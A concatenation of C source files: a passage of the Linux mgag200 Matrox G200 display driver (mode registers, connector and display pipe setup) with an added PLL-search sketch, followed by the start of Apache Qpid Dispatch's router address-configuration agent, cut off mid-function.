WREG_CRT(13, 0); WREG_CRT(14, 0); WREG_CRT(15, 0); RREG_CRT(0x11, crtc11); crtc11 &= ~(MGAREG_CRTC11_CRTCPROTECT | MGAREG_CRTC11_VINTEN | MGAREG_CRTC11_VINTCLR); WREG_CRT(0x11, crtc11); if (mdev->type == G200_ER) WREG_ECRT(0x24, 0x5); if (mdev->type == G200_EW3) WREG_ECRT(0x34, 0x5); misc = RREG8(MGA_MISC_IN); misc |= MGAREG_MISC_IOADSEL; WREG8(MGA_MISC_OUT, misc); } static void mgag200_set_mode_regs(struct mga_device *mdev, const struct drm_display_mode *mode) { unsigned int hdisplay, hsyncstart, hsyncend, htotal; unsigned int vdisplay, vsyncstart, vsyncend, vtotal; u8 misc, crtcext1, crtcext2, crtcext5; hdisplay = mode->hdisplay / 8 - 1; hsyncstart = mode->hsync_start / 8 - 1; hsyncend = mode->hsync_end / 8 - 1; htotal = mode->htotal / 8 - 1; /* Work around hardware quirk */ if ((htotal & 0x07) == 0x06 || (htotal & 0x07) == 0x04) htotal++; vdisplay = mode->vdisplay - 1; vsyncstart = mode->vsync_start - 1; vsyncend = mode->vsync_end - 1; vtotal = mode->vtotal - 2; misc = RREG8(MGA_MISC_IN); if (mode->flags & DRM_MODE_FLAG_NHSYNC) misc |= MGAREG_MISC_HSYNCPOL; else misc &= ~MGAREG_MISC_HSYNCPOL; if (mode->flags & DRM_MODE_FLAG_NVSYNC) misc |= MGAREG_MISC_VSYNCPOL; else misc &= 
~MGAREG_MISC_VSYNCPOL; crtcext1 = (((htotal - 4) & 0x100) >> 8) | ((hdisplay & 0x100) >> 7) | ((hsyncstart & 0x100) >> 6) | (htotal & 0x40); if (mdev->type == G200_WB || mdev->type == G200_EW3) crtcext1 |= BIT(7) | /* vrsten */ BIT(3); /* hrsten */ crtcext2 = ((vtotal & 0xc00) >> 10) | ((vdisplay & 0x400) >> 8) | ((vdisplay & 0xc00) >> 7) | ((vsyncstart & 0xc00) >> 5) | ((vdisplay & 0x400) >> 3); crtcext5 = 0x00; WREG_CRT(0, htotal - 4); WREG_CRT(1, hdisplay); WREG_CRT(2, hdisplay); WREG_CRT(3, (htotal & 0x1F) | 0x80); WREG_CRT(4, hsyncstart); WREG_CRT(5, ((htotal & 0x20) << 2) | (hsyncend & 0x1F)); WREG_CRT(6, vtotal & 0xFF); WREG_CRT(7, ((vtotal & 0x100) >> 8) | ((vdisplay & 0x100) >> 7) | ((vsyncstart & 0x100) >> 6) | ((vdisplay & 0x100) >> 5) | ((vdisplay & 0x100) >> 4) | /* linecomp */ ((vtotal & 0x200) >> 4) | ((vdisplay & 0x200) >> 3) | ((vsyncstart & 0x200) >> 2)); WREG_CRT(9, ((vdisplay & 0x200) >> 4) | ((vdisplay & 0x200) >> 3)); WREG_CRT(16, vsyncstart & 0xFF); WREG_CRT(17, (vsyncend & 0x0F) | 0x20); WREG_CRT(18, vdisplay & 0xFF); WREG_CRT(20, 0); WREG_CRT(21, vdisplay & 0xFF); WREG_CRT(22, (vtotal + 1) & 0xFF); WREG_CRT(23, 0xc3); WREG_CRT(24, vdisplay & 0xFF); WREG_ECRT(0x01, crtcext1); WREG_ECRT(0x02, crtcext2); WREG_ECRT(0x05, crtcext5); WREG8(MGA_MISC_OUT, misc); } static u8 mgag200_get_bpp_shift(struct mga_device *mdev, const struct drm_format_info *format) { return mdev->bpp_shifts[format->cpp[0] - 1]; } /* * Calculates the HW offset value from the framebuffer's pitch. The * offset is a multiple of the pixel size and depends on the display * format. */ static u32 mgag200_calculate_offset(struct mga_device *mdev, const struct drm_framebuffer *fb) { u32 offset = fb->pitches[0] / fb->format->cpp[0]; u8 bppshift = mgag200_get_bpp_shift(mdev, fb->format); if (fb->format->cpp[0] * 8 == 24) offset = (offset * 3) >> (4 - bppshift); else offset = offset >> (4 - bppshift); return offset; } static void mgag200_set_offset(struct mga_device *mdev, const struct drm_framebuffer *fb) { u8 crtc13, crtcext0; u32 offset = mgag200_calculate_offset(mdev, fb); RREG_ECRT(0, crtcext0); crtc13 = offset & 0xff; crtcext0 &= ~MGAREG_CRTCEXT0_OFFSET_MASK; crtcext0 |= (offset >> 4) & MGAREG_CRTCEXT0_OFFSET_MASK; WREG_CRT(0x13, crtc13); WREG_ECRT(0x00, crtcext0); } static void mgag200_set_format_regs(struct mga_device *mdev, const struct drm_framebuffer *fb) { struct drm_device *dev = &mdev->base; const struct drm_format_info *format = fb->format; unsigned int bpp, bppshift, scale; u8 crtcext3, xmulctrl; bpp = format->cpp[0] * 8; bppshift = mgag200_get_bpp_shift(mdev, format); switch (bpp) { case 24: scale = ((1 << bppshift) * 3) - 1; break; default: scale = (1 << bppshift) - 1; break; } RREG_ECRT(3, crtcext3); switch (bpp) { case 8: xmulctrl = MGA1064_MUL_CTL_8bits; break; case 16: if (format->depth == 15) xmulctrl = MGA1064_MUL_CTL_15bits; else xmulctrl = MGA1064_MUL_CTL_16bits; break; case 24: xmulctrl = MGA1064_MUL_CTL_24bits; break; case 32: xmulctrl = MGA1064_MUL_CTL_32_24bits; break; default: /* BUG: We should have caught this problem already. 
*/ drm_WARN_ON(dev, "invalid format depth\n"); return; } crtcext3 &= ~GENMASK(2, 0); crtcext3 |= scale; WREG_DAC(MGA1064_MUL_CTL, xmulctrl); WREG_GFX(0, 0x00); WREG_GFX(1, 0x00); WREG_GFX(2, 0x00); WREG_GFX(3, 0x00); WREG_GFX(4, 0x00); WREG_GFX(5, 0x40); WREG_GFX(6, 0x05); WREG_GFX(7, 0x0f); WREG_GFX(8, 0x0f); WREG_ECRT(3, crtcext3); } static void mgag200_g200er_reset_tagfifo(struct mga_device *mdev) { static uint32_t RESET_FLAG = 0x00200000; /* undocumented magic value */ u32 memctl; memctl = RREG32(MGAREG_MEMCTL); memctl |= RESET_FLAG; WREG32(MGAREG_MEMCTL, memctl); udelay(1000); memctl &= ~RESET_FLAG; WREG32(MGAREG_MEMCTL, memctl); } static void mgag200_g200se_set_hiprilvl(struct mga_device *mdev, const struct drm_display_mode *mode, const struct drm_framebuffer *fb) { u32 unique_rev_id = mdev->model.g200se.unique_rev_id; unsigned int hiprilvl; u8 crtcext6; if (unique_rev_id >= 0x04) { hiprilvl = 0; } else if (unique_rev_id >= 0x02) { unsigned int bpp; unsigned long mb; if (fb->format->cpp[0] * 8 > 16) bpp = 32; else if (fb->format->cpp[0] * 8 > 8) bpp = 16; else bpp = 8; mb = (mode->clock * bpp) / 1000; if (mb > 3100) hiprilvl = 0; else if (mb > 2600) hiprilvl = 1; else if (mb > 1900) hiprilvl = 2; else if (mb > 1160) hiprilvl = 3; else if (mb > 440) hiprilvl = 4; else hiprilvl = 5; } else if (unique_rev_id >= 0x01) { hiprilvl = 3; } else { hiprilvl = 4; } crtcext6 = hiprilvl; /* implicitly sets maxhipri to 0 */ WREG_ECRT(0x06, crtcext6); } static void mgag200_g200ev_set_hiprilvl(struct mga_device *mdev) { WREG_ECRT(0x06, 0x00); } static void mgag200_enable_display(struct mga_device *mdev) { u8 seq0, seq1, crtcext1; RREG_SEQ(0x00, seq0); seq0 |= MGAREG_SEQ0_SYNCRST | MGAREG_SEQ0_ASYNCRST; WREG_SEQ(0x00, seq0); /* * TODO: replace busy waiting with vblank IRQ; put * msleep(50) before changing SCROFF */ mga_wait_vsync(mdev); mga_wait_busy(mdev); RREG_SEQ(0x01, seq1); seq1 &= ~MGAREG_SEQ1_SCROFF; WREG_SEQ(0x01, seq1); msleep(20); RREG_ECRT(0x01, crtcext1); crtcext1 &= ~MGAREG_CRTCEXT1_VSYNCOFF; crtcext1 &= ~MGAREG_CRTCEXT1_HSYNCOFF; WREG_ECRT(0x01, crtcext1); } static void mgag200_disable_display(struct mga_device *mdev) { u8 seq0, seq1, crtcext1; RREG_SEQ(0x00, seq0); seq0 &= ~MGAREG_SEQ0_SYNCRST; WREG_SEQ(0x00, seq0); /* * TODO: replace busy waiting with vblank IRQ; put * msleep(50) before changing SCROFF */ mga_wait_vsync(mdev); mga_wait_busy(mdev); RREG_SEQ(0x01, seq1); seq1 |= MGAREG_SEQ1_SCROFF; WREG_SEQ(0x01, seq1); msleep(20); RREG_ECRT(0x01, crtcext1); crtcext1 |= MGAREG_CRTCEXT1_VSYNCOFF | MGAREG_CRTCEXT1_HSYNCOFF; WREG_ECRT(0x01, crtcext1); } /* * Connector */ static int mga_vga_get_modes(struct drm_connector *connector) { struct mga_connector *mga_connector = to_mga_connector(connector); struct edid *edid; int ret = 0; edid = drm_get_edid(connector, &mga_connector->i2c->adapter); if (edid) { drm_connector_update_edid_property(connector, edid); ret = drm_add_edid_modes(connector, edid); kfree(edid); } return ret; } static uint32_t mga_vga_calculate_mode_bandwidth(struct drm_display_mode *mode, int bits_per_pixel) { uint32_t total_area, divisor; uint64_t active_area, pixels_per_second, bandwidth; uint64_t bytes_per_pixel = (bits_per_pixel + 7) / 8; divisor = 1024; if (!mode->htotal || !mode->vtotal || !mode->clock) return 0; active_area = mode->hdisplay * mode->vdisplay; total_area = mode->htotal * mode->vtotal; pixels_per_second = active_area * mode->clock * 1000; do_div(pixels_per_second, total_area); bandwidth = pixels_per_second * bytes_per_pixel * 100; do_div(bandwidth, 
divisor); return (uint32_t)(bandwidth); } #define MODE_BANDWIDTH MODE_BAD static enum drm_mode_status mga_vga_mode_valid(struct drm_connector *connector, struct drm_display_mode *mode) { struct drm_device *dev = connector->dev; struct mga_device *mdev = to_mga_device(dev); int bpp = 32; if (IS_G200_SE(mdev)) { u32 unique_rev_id = mdev->model.g200se.unique_rev_id; if (unique_rev_id == 0x01) { if (mode->hdisplay > 1600) return MODE_VIRTUAL_X; if (mode->vdisplay > 1200) return MODE_VIRTUAL_Y; if (mga_vga_calculate_mode_bandwidth(mode, bpp) > (24400 * 1024)) return MODE_BANDWIDTH; } else if (unique_rev_id == 0x02) { if (mode->hdisplay > 1920) return MODE_VIRTUAL_X; if (mode->vdisplay > 1200) return MODE_VIRTUAL_Y; if (mga_vga_calculate_mode_bandwidth(mode, bpp) > (30100 * 1024)) return MODE_BANDWIDTH; } else { if (mga_vga_calculate_mode_bandwidth(mode, bpp) > (55000 * 1024)) return MODE_BANDWIDTH; } } else if (mdev->type == G200_WB) { if (mode->hdisplay > 1280) return MODE_VIRTUAL_X; if (mode->vdisplay > 1024) return MODE_VIRTUAL_Y; if (mga_vga_calculate_mode_bandwidth(mode, bpp) > (31877 * 1024)) return MODE_BANDWIDTH; } else if (mdev->type == G200_EV && (mga_vga_calculate_mode_bandwidth(mode, bpp) > (32700 * 1024))) { return MODE_BANDWIDTH; } else if (mdev->type == G200_EH && (mga_vga_calculate_mode_bandwidth(mode, bpp) > (37500 * 1024))) { return MODE_BANDWIDTH; } else if (mdev->type == G200_ER && (mga_vga_calculate_mode_bandwidth(mode, bpp) > (55000 * 1024))) { return MODE_BANDWIDTH; } if ((mode->hdisplay % 8) != 0 || (mode->hsync_start % 8) != 0 || (mode->hsync_end % 8) != 0 || (mode->htotal % 8) != 0) { return MODE_H_ILLEGAL; } if (mode->crtc_hdisplay > 2048 || mode->crtc_hsync_start > 4096 || mode->crtc_hsync_end > 4096 || mode->crtc_htotal > 4096 || mode->crtc_vdisplay > 2048 || mode->crtc_vsync_start > 4096 || mode->crtc_vsync_end > 4096 || mode->crtc_vtotal > 4096) { return MODE_BAD; } /* Validate the mode input by the user */ if (connector->cmdline_mode.specified) { if (connector->cmdline_mode.bpp_specified) bpp = connector->cmdline_mode.bpp; } if ((mode->hdisplay * mode->vdisplay * (bpp/8)) > mdev->vram_fb_available) { if (connector->cmdline_mode.specified) connector->cmdline_mode.specified = false; return MODE_BAD; } return MODE_OK; } static void mga_connector_destroy(struct drm_connector *connector) { struct mga_connector *mga_connector = to_mga_connector(connector); mgag200_i2c_destroy(mga_connector->i2c); drm_connector_cleanup(connector); } static const struct drm_connector_helper_funcs mga_vga_connector_helper_funcs = { .get_modes = mga_vga_get_modes, .mode_valid = mga_vga_mode_valid, }; static const struct drm_connector_funcs mga_vga_connector_funcs = { .reset = drm_atomic_helper_connector_reset, .fill_modes = drm_helper_probe_single_connector_modes, .destroy = mga_connector_destroy, .atomic_duplicate_state = drm_atomic_helper_connector_duplicate_state, .atomic_destroy_state = drm_atomic_helper_connector_destroy_state, }; static int mgag200_vga_connector_init(struct mga_device *mdev) { struct drm_device *dev = &mdev->base; struct mga_connector *mconnector = &mdev->connector; struct drm_connector *connector = &mconnector->base; struct mga_i2c_chan *i2c; int ret; i2c = mgag200_i2c_create(dev); if (!i2c) drm_warn(dev, "failed to add DDC bus\n"); ret = drm_connector_init_with_ddc(dev, connector, &mga_vga_connector_funcs, DRM_MODE_CONNECTOR_VGA, &i2c->adapter); if (ret) goto err_mgag200_i2c_destroy; drm_connector_helper_add(connector, &mga_vga_connector_helper_funcs); 
mconnector->i2c = i2c; return 0; err_mgag200_i2c_destroy: mgag200_i2c_destroy(i2c); return ret; } /* * Simple Display Pipe */ static enum drm_mode_status mgag200_simple_display_pipe_mode_valid(struct drm_simple_display_pipe *pipe, const struct drm_display_mode *mode) { return MODE_OK; } static void mgag200_handle_damage(struct mga_device *mdev, struct drm_framebuffer *fb, struct drm_rect *clip) { struct drm_device *dev = &mdev->base; void *vmap; vmap = drm_gem_shmem_vmap(fb->obj[0]); if (drm_WARN_ON(dev, !vmap)) return; /* BUG: SHMEM BO should always be vmapped */ drm_fb_memcpy_dstclip(mdev->vram, vmap, fb, clip); drm_gem_shmem_vunmap(fb->obj[0], vmap); /* Always scanout image at VRAM offset 0 */ mgag200_set_startadd(mdev, (u32)0); mgag200_set_offset(mdev, fb); } static void mgag200_simple_display_pipe_enable(struct drm_simple_display_pipe *pipe, struct drm_crtc_state *crtc_state, struct drm_plane_state *plane_state) { struct drm_crtc *crtc = &pipe->crtc; struct drm_device *dev = crtc->dev; struct mga_device *mdev = to_mga_device(dev); struct drm_display_mode *adjusted_mode = &crtc_state->adjusted_mode; struct drm_framebuffer *fb = plane_state->fb; struct drm_rect fullscreen = { .x1 = 0, .x2 = fb->width, .y1 = 0, .y2 = fb->height, }; if (mdev->type == G200_WB || mdev->type == G200_EW3) mgag200_g200wb_hold_bmc(mdev); mgag200_set_format_regs(mdev, fb); mgag200_set_mode_regs(mdev, adjusted_mode); mgag200_crtc_set_plls(mdev, adjusted_mode->clock); if (mdev->type == G200_ER) mgag200_g200er_reset_tagfifo(mdev); if (IS_G200_SE(mdev)) mgag200_g200se_set_hiprilvl(mdev, adjusted_mode, fb); else if (mdev->type == G200_EV) mgag200_g200ev_set_hiprilvl(mdev); if (mdev->type == G200_WB || mdev->type == G200_EW3) mgag200_g200wb_release_bmc(mdev); mga_crtc_load_lut(crtc); mgag200_enable_display(mdev); mgag200_handle_damage(mdev, fb, &fullscreen); } static void mgag200_simple_display_pipe_disable(struct drm_simple_display_pipe *pipe) { struct drm_crtc *crtc = &pipe->crtc; struct mga_device *mdev = to_mga_device(crtc->dev); mgag200_disable_display(mdev); } static int mgag200_simple_display_pipe_check(struct drm_simple_display_pipe *pipe, struct drm_plane_state *plane_state, struct drm_crtc_state *crtc_state) { struct drm_plane *plane = plane_state->plane; struct drm_framebuffer *new_fb = plane_state->fb; struct drm_framebuffer *fb = NULL; if (!new_fb) return 0; if (plane->state) fb = plane->state->fb; if (!fb || (fb->format != new_fb->format)) crtc_state->mode_changed = true; /* update PLL settings */ return 0; } static void mgag200_simple_display_pipe_update(struct drm_simple_display_pipe *pipe, struct drm_plane_state *old_state) { struct drm_plane *plane = &pipe->plane; struct drm_device *dev = plane->dev; struct mga_device *mdev = to_mga_device(dev); struct drm_plane_state *state = plane->state; struct drm_framebuffer *fb = state->fb; struct drm_rect damage; if (!fb) return; if (drm_atomic_helper_damage_merged(old_state, state, &damage)) mgag200_handle_damage(mdev, fb, &damage); } static const struct drm_simple_display_pipe_funcs mgag200_simple_display_pipe_funcs = { .mode_valid = mgag200_simple_display_pipe_mode_valid, .enable = mgag200_simple_display_pipe_enable, .disable = mgag200_simple_display_pipe_disable, .check = mgag200_simple_display_pipe_check, .update = mgag200_simple_display_pipe_update, .prepare_fb = drm_gem_fb_simple_display_pipe_prepare_fb, }; static const uint32_t mgag200_simple_display_pipe_formats[] = { DRM_FORMAT_XRGB8888, DRM_FORMAT_RGB565, DRM_FORMAT_RGB888, }; static const uint64_t 
mgag200_simple_display_pipe_fmtmods[] = { DRM_FORMAT_MOD_LINEAR, DRM_FORMAT_MOD_INVALID }; /* * Mode config */ static const struct drm_mode_config_funcs mgag200_mode_config_funcs = { .fb_create = drm_gem_fb_create_with_dirty, .atomic_check = drm_atomic_helper_check, .atomic_commit = drm_atomic_helper_commit, }; static unsigned int mgag200_preferred_depth(struct mga_device *mdev) { if (IS_G200_SE(mdev) && mdev->vram_fb_available < (2048*1024)) return 16; else return 32; } int mgag200_modeset_init(struct mga_device *mdev) { struct drm_device *dev = &mdev->base; struct drm_connector *connector = &mdev->connector.base; struct drm_simple_display_pipe *pipe = &mdev->display_pipe; size_t format_count = ARRAY_SIZE(mgag200_simple_display_pipe_formats); int ret; mdev->bpp_shifts[0] = 0; mdev->bpp_shifts[1] = 1; mdev->bpp_shifts[2] = 0; mdev->bpp_shifts[3] = 2; mgag200_init_regs(mdev); ret = drmm_mode_config_init(dev); if (ret) { drm_err(dev, "drmm_mode_config_init() failed, error %d\n", ret); return ret; } dev->mode_config.max_width = MGAG200_MAX_FB_WIDTH; dev->mode_config.max_height = MGAG200_MAX_FB_HEIGHT; dev->mode_config.preferred_depth = mgag200_preferred_depth(mdev); dev->mode_config.fb_base = mdev->mc.vram_base; dev->mode_config.funcs = &mgag200_mode_config_funcs; ret = mgag200_vga_connector_init(mdev); if (ret) { drm_err(dev, "mgag200_vga_connector_init() failed, error %d\n", ret); return ret; } ret = drm_simple_display_pipe_init(dev, pipe, &mgag200_simple_display_pipe_funcs, mgag200_simple_display_pipe_formats, format_count, mgag200_simple_display_pipe_fmtmods, connector); if (ret) { drm_err(dev, "drm_simple_display_pipe_init() failed, error %d\n", ret); return ret; } /* FIXME: legacy gamma tables; convert to CRTC state */ drm_mode_crtc_set_gamma_size(&pipe->crtc, MGAG200_LUT_SIZE); drm_mode_config_reset(dev); return 0; }
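/*
 * Editor's illustration (not part of the original file): every
 * mga_g200*_set_plls() variant above implements the same brute-force
 * search -- sweep the allowed post-divider (p), feedback divider (n) and
 * input divider (m) ranges, keep the combination whose computed clock
 * deviates least from the requested pixel clock, and only accept settings
 * whose VCO frequency stays inside [vcomin, vcomax]. The standalone sketch
 * below shows the bare pattern; the divider ranges are examples, and the
 * chip-specific bit packing into registers is deliberately omitted.
 */
#include <limits.h>

static int pll_brute_force_search(long pllreffreq, long vcomin, long vcomax,
                                  long clock, long *best_m, long *best_n,
                                  long *best_p)
{
    long delta = LONG_MAX;
    long testp, testm, testn;

    for (testp = 1; testp <= 8; testp <<= 1) {
        /* The VCO runs at clock * p and must stay within its legal range. */
        if (clock * testp > vcomax || clock * testp < vcomin)
            continue;
        for (testn = 1; testn <= 127; testn++) {
            for (testm = 1; testm <= 31; testm++) {
                long computed = (pllreffreq * testn) / (testm * testp);
                long tmpdelta = computed > clock ? computed - clock
                                                 : clock - computed;
                if (tmpdelta < delta) {
                    delta = tmpdelta;
                    *best_m = testm;
                    *best_n = testn;
                    *best_p = testp;
                }
            }
        }
    }
    /* -1: no divider combination put the VCO in range. */
    return delta == LONG_MAX ? -1 : 0;
}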
935358.c
/*
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 */

#include <qpid/dispatch/ctools.h>
#include "agent_config_address.h"
#include <inttypes.h>
#include <stdio.h>

#define QDR_CONFIG_ADDRESS_NAME          0
#define QDR_CONFIG_ADDRESS_IDENTITY      1
#define QDR_CONFIG_ADDRESS_TYPE          2
#define QDR_CONFIG_ADDRESS_PREFIX        3
#define QDR_CONFIG_ADDRESS_DISTRIBUTION  4
#define QDR_CONFIG_ADDRESS_WAYPOINT      5
#define QDR_CONFIG_ADDRESS_IN_PHASE      6
#define QDR_CONFIG_ADDRESS_OUT_PHASE     7
#define QDR_CONFIG_ADDRESS_PATTERN       8
#define QDR_CONFIG_ADDRESS_PRIORITY      9
#define QDR_CONFIG_ADDRESS_FALLBACK     10

const char *qdr_config_address_columns[] =
    {"name",
     "identity",
     "type",
     "prefix",
     "distribution",
     "waypoint",
     "ingressPhase",
     "egressPhase",
     "pattern",
     "priority",
     "fallback",
     0};

const char *CONFIG_ADDRESS_TYPE = "org.apache.qpid.dispatch.router.config.address";
const char CONFIG_ADDRESS_PREFIX = 'C';

static void qdr_config_address_insert_column_CT(qdr_address_config_t *addr,
                                                int col,
                                                qd_composed_field_t *body,
                                                bool as_map)
{
    const char *text = 0;

    if (as_map)
        qd_compose_insert_string(body, qdr_config_address_columns[col]);

    switch (col) {
    case QDR_CONFIG_ADDRESS_NAME:
        if (addr->name)
            qd_compose_insert_string(body, addr->name);
        else
            qd_compose_insert_null(body);
        break;

    case QDR_CONFIG_ADDRESS_IDENTITY: {
        char id_str[100];
        snprintf(id_str, 100, "%"PRId64, addr->identity);
        qd_compose_insert_string(body, id_str);
        break;
    }

    case QDR_CONFIG_ADDRESS_TYPE:
        qd_compose_insert_string(body, CONFIG_ADDRESS_TYPE);
        break;

    case QDR_CONFIG_ADDRESS_PREFIX:
        if (addr->is_prefix && addr->pattern) {
            // Note (kgiusti): internally we append a '/#' to the configured
            // prefix and treat it like a pattern.
Remove trailing '/#' to put // it back into its original form const size_t len = strlen(addr->pattern); assert(len > 1); qd_compose_insert_string_n(body, addr->pattern, len - 2); } else qd_compose_insert_null(body); break; case QDR_CONFIG_ADDRESS_PATTERN: if (!addr->is_prefix && addr->pattern) qd_compose_insert_string(body, addr->pattern); else qd_compose_insert_null(body); break; case QDR_CONFIG_ADDRESS_DISTRIBUTION: switch (addr->treatment) { case QD_TREATMENT_MULTICAST_FLOOD: case QD_TREATMENT_MULTICAST_ONCE: text = "multicast"; break; case QD_TREATMENT_ANYCAST_CLOSEST: text = "closest"; break; case QD_TREATMENT_ANYCAST_BALANCED: text = "balanced"; break; default: text = 0; } if (text) qd_compose_insert_string(body, text); else qd_compose_insert_null(body); break; case QDR_CONFIG_ADDRESS_WAYPOINT: qd_compose_insert_bool(body, addr->in_phase == 0 && addr->out_phase == 1); break; case QDR_CONFIG_ADDRESS_IN_PHASE: qd_compose_insert_int(body, addr->in_phase); break; case QDR_CONFIG_ADDRESS_OUT_PHASE: qd_compose_insert_int(body, addr->out_phase); break; case QDR_CONFIG_ADDRESS_PRIORITY: qd_compose_insert_int(body, addr->priority); break; case QDR_CONFIG_ADDRESS_FALLBACK: qd_compose_insert_bool(body, addr->fallback); break; } } static void qdr_agent_write_config_address_CT(qdr_query_t *query, qdr_address_config_t *addr) { qd_composed_field_t *body = query->body; qd_compose_start_list(body); int i = 0; while (query->columns[i] >= 0) { qdr_config_address_insert_column_CT(addr, query->columns[i], body, false); i++; } qd_compose_end_list(body); } static void qdr_manage_advance_config_address_CT(qdr_query_t *query, qdr_address_config_t *addr) { if (addr) { addr = DEQ_NEXT(addr); query->more = !!addr; query->next_offset++; } else { query->more = false; } } void qdra_config_address_get_first_CT(qdr_core_t *core, qdr_query_t *query, int offset) { // // Queries that get this far will always succeed. // query->status = QD_AMQP_OK; // // If the offset goes beyond the set of objects, end the query now. // if (offset >= DEQ_SIZE(core->addr_config)) { query->more = false; qdr_agent_enqueue_response_CT(core, query); return; } // // Run to the object at the offset. // qdr_address_config_t *addr = DEQ_HEAD(core->addr_config); for (int i = 0; i < offset && addr; i++) addr = DEQ_NEXT(addr); assert(addr); if (addr) { // // Write the columns of the object into the response body. // qdr_agent_write_config_address_CT(query, addr); // // Advance to the next address // query->next_offset = offset; qdr_manage_advance_config_address_CT(query, addr); } else { query->more = false; } // // Enqueue the response. // qdr_agent_enqueue_response_CT(core, query); } void qdra_config_address_get_next_CT(qdr_core_t *core, qdr_query_t *query) { qdr_address_config_t *addr = 0; if (query->next_offset < DEQ_SIZE(core->addr_config)) { addr = DEQ_HEAD(core->addr_config); if (!addr) { query->more = false; qdr_agent_enqueue_response_CT(core, query); return; } for (int i = 0; i < query->next_offset && addr; i++) addr = DEQ_NEXT(addr); } if (addr) { // // Write the columns of the addr entity into the response body. // qdr_agent_write_config_address_CT(query, addr); // // Advance to the next object // qdr_manage_advance_config_address_CT(query, addr); } else query->more = false; // // Enqueue the response. 
// qdr_agent_enqueue_response_CT(core, query); } static qd_address_treatment_t qdra_address_treatment_CT(qd_parsed_field_t *field) { if (field) { qd_iterator_t *iter = qd_parse_raw(field); if (qd_iterator_equal(iter, (unsigned char*) "multicast")) return QD_TREATMENT_MULTICAST_ONCE; if (qd_iterator_equal(iter, (unsigned char*) "closest")) return QD_TREATMENT_ANYCAST_CLOSEST; if (qd_iterator_equal(iter, (unsigned char*) "balanced")) return QD_TREATMENT_ANYCAST_BALANCED; if (qd_iterator_equal(iter, (unsigned char*) "unavailable")) return QD_TREATMENT_UNAVAILABLE; } return QD_TREATMENT_ANYCAST_BALANCED; } static qdr_address_config_t *qdr_address_config_find_by_identity_CT(qdr_core_t *core, qd_iterator_t *identity) { if (!identity) return 0; qdr_address_config_t *rc = DEQ_HEAD(core->addr_config); while (rc) { // Convert the passed in identity to a char* char id[100]; snprintf(id, 100, "%"PRId64, rc->identity); if (qd_iterator_equal(identity, (const unsigned char*) id)) break; rc = DEQ_NEXT(rc); } return rc; } static qdr_address_config_t *qdr_address_config_find_by_name_CT(qdr_core_t *core, qd_iterator_t *name) { if (!name) return 0; qdr_address_config_t *rc = DEQ_HEAD(core->addr_config); while (rc) { // Sometimes the name can be null if (rc->name && qd_iterator_equal(name, (const unsigned char*) rc->name)) break; rc = DEQ_NEXT(rc); } return rc; } void qdra_config_address_delete_CT(qdr_core_t *core, qdr_query_t *query, qd_iterator_t *name, qd_iterator_t *identity) { qdr_address_config_t *addr = 0; if (!name && !identity) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "No name or identity provided"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing DELETE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); } else { if (identity) addr = qdr_address_config_find_by_identity_CT(core, identity); else if (name) addr = qdr_address_config_find_by_name_CT(core, name); if (addr) { qdr_core_remove_address_config(core, addr); query->status = QD_AMQP_NO_CONTENT; } else query->status = QD_AMQP_NOT_FOUND; } // // Enqueue the response. 
// qdr_agent_enqueue_response_CT(core, query); } void qdra_config_address_create_CT(qdr_core_t *core, qd_iterator_t *name, qdr_query_t *query, qd_parsed_field_t *in_body) { char *pattern = NULL; while (true) { // // Ensure there isn't a duplicate name // qdr_address_config_t *addr = 0; if (name) { qd_iterator_view_t iter_view = qd_iterator_get_view(name); qd_iterator_annotate_prefix(name, CONFIG_ADDRESS_PREFIX); qd_iterator_reset_view(name, ITER_VIEW_ADDRESS_HASH); qd_hash_retrieve(core->addr_lr_al_hash, name, (void**) &addr); qd_iterator_reset_view(name, iter_view); } if (!!addr) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Name conflicts with an existing entity"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // Ensure that the body is a map if (!qd_parse_is_map(in_body)) { query->status = QD_AMQP_BAD_REQUEST; query->status.description = "Body of request must be a map"; qd_log(core->agent_log, QD_LOG_ERROR, "Error performing CREATE of %s: %s", CONFIG_ADDRESS_TYPE, query->status.description); break; } // // Extract the fields from the request // qd_parsed_field_t *prefix_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_PREFIX]); qd_parsed_field_t *pattern_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_PATTERN]); qd_parsed_field_t *distrib_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_DISTRIBUTION]); qd_parsed_field_t *waypoint_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_WAYPOINT]); qd_parsed_field_t *in_phase_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_IN_PHASE]); qd_parsed_field_t *out_phase_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_OUT_PHASE]); qd_parsed_field_t *priority_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_PRIORITY]); qd_parsed_field_t *fallback_field = qd_parse_value_by_key(in_body, qdr_config_address_columns[QDR_CONFIG_ADDRESS_FALLBACK]); bool waypoint = waypoint_field ? qd_parse_as_bool(waypoint_field) : false; long in_phase = in_phase_field ? qd_parse_as_long(in_phase_field) : -1; long out_phase = out_phase_field ? qd_parse_as_long(out_phase_field) : -1; long priority = priority_field ? qd_parse_as_long(priority_field) : -1; bool fallback = fallback_field ? qd_parse_as_bool(fallback_field) : false; // // Either a prefix or a pattern field is mandatory. Prefix and pattern // are mutually exclusive. Fail if either both or none are given. // const char *msg = NULL; if (!prefix_field && !pattern_field) { msg = "Either a 'prefix' or 'pattern' attribute must be provided"; } else if (prefix_field && pattern_field) { msg = "Cannot specify 